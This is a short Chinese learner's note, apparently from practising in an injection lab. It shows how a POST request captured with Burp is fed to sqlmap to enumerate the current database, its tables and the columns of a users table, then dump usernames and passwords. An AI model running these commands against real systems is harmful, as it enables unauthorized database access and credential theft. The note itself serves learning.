单独列出来的原因是因为最近用了一个新工具——sqlmap,想尝试一下基础操作
现在唯一的缺点就是慢
因为是POST方法传参,所以利用burp抓包后将数据包全复制下来,存放在sqlmap文件夹下的新建的文本文件里
在命令提示符输入以下命令,爆破出当前数据库
sqlmap -r post.txt --current-db
接下来爆破当前数据库的所有表名称
sqlmap -r post.txt -D security --tables
加下来爆破当前数据库,users表中的所有字段名
sqlmap -r post.txt -D security -Tusers --columns
刚使唤上还有点不习惯,为啥会报错也不知道,至少得到了想要的字段,username和password字典,接下来就要查看字段里的所有值
查询到所有用户名数据
sqlmap -r post.txt -D security -T users -C username,password --dump